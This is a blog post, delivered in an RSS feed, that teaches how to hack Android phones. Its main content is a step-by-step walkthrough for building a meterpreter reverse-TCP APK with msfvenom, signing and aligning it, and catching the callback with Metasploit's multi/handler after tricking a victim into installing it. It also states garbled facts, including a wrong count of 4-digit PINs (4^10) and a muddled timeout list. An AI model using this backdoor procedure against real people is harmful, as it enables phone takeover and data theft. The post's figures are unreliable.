<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>android hacks; mobile hacks Archives - Tech Chronicles</title>
	<atom:link href="http://kostacipo.stream/tag/android-hacks-mobile-hacks/feed/" rel="self" type="application/rss+xml" />
	<link>https://kostacipo.stream/tag/android-hacks-mobile-hacks/</link>
	<description>Ramblings of a Tech Dude</description>
	<lastBuildDate>Mon, 24 Jul 2023 22:13:39 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.8.2</generator>

<image>
	<url>https://kostacipo.stream/wp-content/uploads/2019/12/cropped-profile-32x32.jpg</url>
	<title>android hacks; mobile hacks Archives - Tech Chronicles</title>
	<link>https://kostacipo.stream/tag/android-hacks-mobile-hacks/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>How to Hack Android Phones</title>
		<link>http://kostacipo.stream/how-to-hack-android-phones/</link>
					<comments>http://kostacipo.stream/how-to-hack-android-phones/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Mon, 24 Jul 2023 22:13:39 +0000</pubDate>
				<category><![CDATA[Mobile]]></category>
		<category><![CDATA[android hacks; mobile hacks]]></category>
		<guid isPermaLink="false">https://kostacipo.stream/?p=2152</guid>

					<description><![CDATA[<p>The methods used by attackers to exploit android phones are increasing. People are busy finding new vulnerabilities to exploit. Below are a few ways to hack Android phones: HID (Human Interface Device) Attack Password BruteForce Payloads (Custom hacking scripts) Factory Reset Bypass HID The HID attack is a scenario in which an attacker takes a [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/how-to-hack-android-phones/">How to Hack Android Phones</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p class="paragraph">The methods used by attackers to exploit android phones are increasing. People are busy finding new vulnerabilities to exploit. Below are a few ways to hack Android phones:</p>
<ul>
<li>HID (Human Interface Device) Attack</li>
<li>Password BruteForce</li>
<li>Payloads (Custom hacking scripts)</li>
<li>Factory Reset</li>
<li>Bypass</li>
</ul>
<h2 id="h-hid">HID</h2>
<p class="paragraph">The HID attack is a scenario in which an attacker takes a programmable embedded development platform, such as an associated software package like SET (Social Engineering Toolkit), Metasploit, etc., or uses other phones and USB&#8217;s which are programmed to be a RubberDucky and execute an attack.</p>
<div class="image-container">
<div class="sc-a6c0bd8c-1 ijZWBT image-container undefined"></div>
</div>
<div></div>
<p class="paragraph">In such an attack, the hacker installs a backdoor, and by using that, he completely downloads the target&#8217;s information.</p>
<p class="paragraph">Using the information, he can either hack into the bank account of the person or even sell them on the dark web.</p>
<p class="paragraph">You can see how a hid attack is conducted from the</p>
<pre><code>android infosec</code></pre>
<p class="paragraph">channel</p>
<h2 id="h-login-bruteforce">Login Bruteforce</h2>
<p class="paragraph">A brute-force attack uses the trial and error method to guess the correct password of the phone.</p>
<div class="image-container">
<div class="sc-a6c0bd8c-1 ijZWBT image-container undefined"></div>
</div>
<div></div>
<p class="paragraph">Some important points to consider to conduct such an attack:</p>
<ul>
<li>Number of passwords</li>
<li>The timeout</li>
<li>The time it might take</li>
</ul>
<p class="paragraph"><strong><em>The timeout:</em></strong></p>
<div class="code-container">
<pre><code class="language-bash">After 5 Wrong pin's - 30 sec delay
After 1 Wrong pin's - 30 sec delay
After 41 Wrong pin's - 30 sec delay</code></pre>
</div>
<p class="paragraph"><strong><em>The number of passwords:</em></strong></p>
<p class="paragraph">The total number of possible combinations for a 4 digit numeric lock can start from 4 zeros to 4 nines which means 0000-9999, so we have about :</p>
<div class="code-container">
<pre><code class="language-python">4^10 amount of password

or

1048576 passwords in total</code></pre>
</div>
<p class="paragraph"><strong><em>Time consumed:</em></strong></p>
<p class="paragraph">Let&#8217;s see some possibilities for our understanding:</p>
<p class="paragraph"><strong>Possibility # 1: </strong>5 passwords wrong, a delay of 30 seconds. We need to find out how many times we get the delay in the first place and find the total time consumed.</p>
<div class="code-container">
<pre><code class="language-python">total delay
1048576/5 = 209715.2 times

total time
209715.2 * 30 = 6291456 sec

or

1747.6266 hours</code></pre>
</div>
<p class="paragraph"><strong>Possibility # 2</strong>: 41 passwords wrong, delay 30 sec.</p>
<div class="code-container">
<pre><code class="language-python">total delays
1048576 / 41 = 25,575.0243 delays

total time consumed 
25575.0243 * 30 = 7,67,250.729 sec

or 

767250.729 / 60 = 12,787.5121 min

or

12,787.51215 hours </code></pre>
</div>
<p class="paragraph">You can see it is almost impossible to find the person&#8217;s phone&#8217;s password by brute-forcing. You will be dead by the time you find the phone&#8217;s password <img src="https://s.w.org/images/core/emoji/16.0.1/72x72/1f623.png" alt="😣" class="wp-smiley" style="height: 1em; max-height: 1em;" />.</p>
<h2 id="h-payloads">Payloads</h2>
<div class="image-container">
<div class="sc-a6c0bd8c-1 ijZWBT image-container undefined"></div>
</div>
<div></div>
<p class="paragraph">Payloads are simple scripts that help a hacker hack a system. So now, if I just trick the person into authorizing and installing the .apk file, which opens a back door for Meterpreter to listen on for a connection to get the system under its control.</p>
<pre><code><strong><em>meterpreter reverse tcp payload creation command:</em></strong></code></pre>
<div class="code-container">
<pre><code class="language-teminal">msfvenom –p android/meterpreter/reverse_tcp LHOST=Localhost IP  LPORT=LocalPort R &gt; android_shell.apk</code></pre>
</div>
<p class="paragraph">Payload is -p, LHOST Localhost IP to receive a back connection (Check yours with <em>if-config</em> command), LPORT Localhost port on which the connection listen for the victim (we set it to 4444), R Raw format (we select .apk).</p>
<p class="paragraph">We need to provide a certificate to the .apk file to give it an identity. We need to sign a cert for a .apk file to give it recognition as an application. Without this, the .apk file will be recognized as a virus.</p>
<p class="paragraph">To assign a cert, you must follow these steps</p>
<p class="paragraph"><strong>Install:</strong></p>
<ul>
<li>Keytool</li>
<li>Jar signer</li>
<li>Zipalign</li>
</ul>
<p class="paragraph"><strong>Sign the .apk file locally:</strong></p>
<div class="code-container">
<pre><code class="language-javascript"> keytool -genkey -V -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000</code></pre>
</div>
<p class="paragraph"><strong>Keytool making Keystore:</strong></p>
<div class="code-container">
<pre><code class="language-javascript"> jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore android_shell.apk hacked</code></pre>
</div>
<p class="paragraph"><strong>Signing a .apk file with JARsigner:</strong></p>
<div class="code-container">
<pre><code class="language-javascript"> jarsigner -verify -verbose -certs android_shell.apk</code></pre>
</div>
<p class="paragraph"><strong>Install and use Zipalign:</strong></p>
<div class="code-container">
<pre><code class="language-javascript"> sudo apt-get install zipalign 

or

 sudo apt install zipalign
</code></pre>
</div>
<div class="code-container">
<pre><code class="language-javascript"> zipalign -v 4 android_shell.apk singed_jar.apk</code></pre>
</div>
<p class="paragraph">Now run the command for that is in the Metasploit console:</p>
<div class="code-container">
<pre><code class="language-javascript">use exploit/multi/handler</code></pre>
</div>
<p class="paragraph">And set the various parameters in Metasploit like the lhost, lport, etc. Now you need to run the command after setting the host and port type:</p>
<div class="code-container">
<pre><code class="language-javascript">type:
run (and press enter)
</code></pre>
</div>
<p class="paragraph">After you execute this code, you will receive a connection to the target system. Using this, you can access the whole system and gain full access.</p>
<h2 id="h-factory-reset">Factory Reset</h2>
<div class="image-container">
<div class="sc-a6c0bd8c-1 ijZWBT image-container undefined"></div>
</div>
<div></div>
<p class="paragraph">A flashed phone is a device where a different ROM/operating system has been flashed on top of the system that came with the phone. Often, phones can be flashed to appear unlocked, whereas, in reality, they are still carrier-branded phones that will not be compatible with our service.</p>
<p class="paragraph">For every phone, there are different methods for factory reset, the most common is to do it via the volume buttons and the power button. For example, I have an old oppo phone for which the factory reset combination is down volume button and power button and for 5 seconds and the phone is flashed.</p>
<h2 id="h-bypass">Bypass</h2>
<p class="paragraph">Bypass is a commonly used method by law enforcement like the CIA, FBI &amp; in India, the IB &amp; RAW use a special device as shown in the picture.</p>
<div class="image-container">
<div class="sc-a6c0bd8c-1 ijZWBT image-container undefined"></div>
</div>
<div></div>
<p class="paragraph">In such kind of attack&#8217;s it mainly depends on the attacker using the IP_BOX, which works mainly on the bruteforcing of the target. This is mainly used by law enforcement to get into the phones of terrorist&#8217;s cybercriminals and other criminals&#8217; phones.</p>
<p class="paragraph">You can use another tool known as the BashBunny from hak5. This is a mini-computer from which u can conduct a login Bruteforce attack. Unlike the other options above, this is a serious beast in its work. In a matter of hours, you can crack the most difficult of difficult passwords with ease.</p>
<p class="paragraph"><strong>Note</strong></p>
<p class="paragraph"><em>This tutorial is for educational purposes only. Dont try this and get into trouble.</em></p>
<h2 id="h-sources">Sources</h2>
<ul>
<li>rapid7 <strong><em>(</em></strong><a href="https://www.rapid7.com/globalassets/_pdfs/product-and-service-briefs/rapid7-product-brief-metasploit.pdf?ref=hackernoon.com" target="_blank" rel="noopener noreferrer ugc"><strong><em>Refered Metasploit Information and Docs</em></strong></a><strong><em>)</em></strong></li>
<li>android infosec <strong><em>(</em></strong><a href="https://www.youtube.com/channel/UCg08SXtXlfADk4yAODpShfQ?ref=hackernoon.com" target="_blank" rel="noopener noreferrer ugc"><strong><em>Learn About HID Attack</em></strong></a><strong><em>)</em></strong></li>
<li>David Bombal <strong><em>(</em></strong><a href="https://www.youtube.com/channel/UCP7WmQ_U4GB3K51Od9QvM0w?ref=hackernoon.com" target="_blank" rel="noopener noreferrer ugc"><strong><em>Learn About Bash-Bunny</em></strong></a><strong><em>)</em></strong></li>
</ul>
<p>The post <a href="http://kostacipo.stream/how-to-hack-android-phones/">How to Hack Android Phones</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/how-to-hack-android-phones/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
